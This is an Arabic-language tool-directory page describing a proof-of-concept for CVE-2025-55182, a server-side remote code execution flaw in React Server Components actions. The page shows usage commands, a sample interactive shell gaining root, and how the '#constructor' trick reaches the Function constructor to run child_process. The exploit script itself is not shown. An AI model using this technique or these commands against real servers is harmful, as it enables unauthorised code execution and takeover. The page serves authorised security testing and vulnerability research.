Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-PoC — إثبات المفهوم لـ CVE-2025-55182 | Kitploit
أدوات/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

إثبات المفهوم لـ CVE-2025-55182

عرض المستودع
1منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182-PoC

Poc لـ CVE-2025-55182

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

إخلاء مسؤولية قانوني

هذه الأداة مقدمة للأغراض التعليمية واختبار الأمان المصرح به فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. المطور لا يتحمل أي مسؤولية ولا يكون مسؤولاً عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

المتطلبات

pip install requests

الاستخدام

يمكنك تشغيل الأداة في ثلاثة أوضاع: Check (التحقق)، Exploit (الاستغلال)، أو Interactive Shell (شل تفاعلي).

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

مثال

root@kitploit:~
python3 poc.py -u http://target-site.com --check

تنفيذ أمر منفرد

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

وضع شل تفاعلي

root@kitploit:~
python3 poc.py

# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

كيف يعمل

التحقق (Check): يرسل طلبًا متعدد الأجزاء (multipart) يُعرّف {} في الفهرس 1، ويحاول الوصول إلى ["$1:a:a"]. الخوادم غير المصححة تتعطل (HTTP 500) عند محاولة الوصول إلى الخاصية a لقيمة غير معرّفة. الخوادم المصححة ترجع HTTP 200.

الاستغلال (Exploit): يرسل طلبًا متعدد الأجزاء يشير إلى معرف الإجراء (Action ID) الصحيح، لكنه يُلحق #constructor. وهذا يخدع المسلسل (serializer) ليُعيد مُنشئ الدالة (Function constructor)، مما يسمح بتمرير JavaScript عشوائي (child_process في Node.js) ليتم تنفيذه على الخادم.

تنزيل الأداة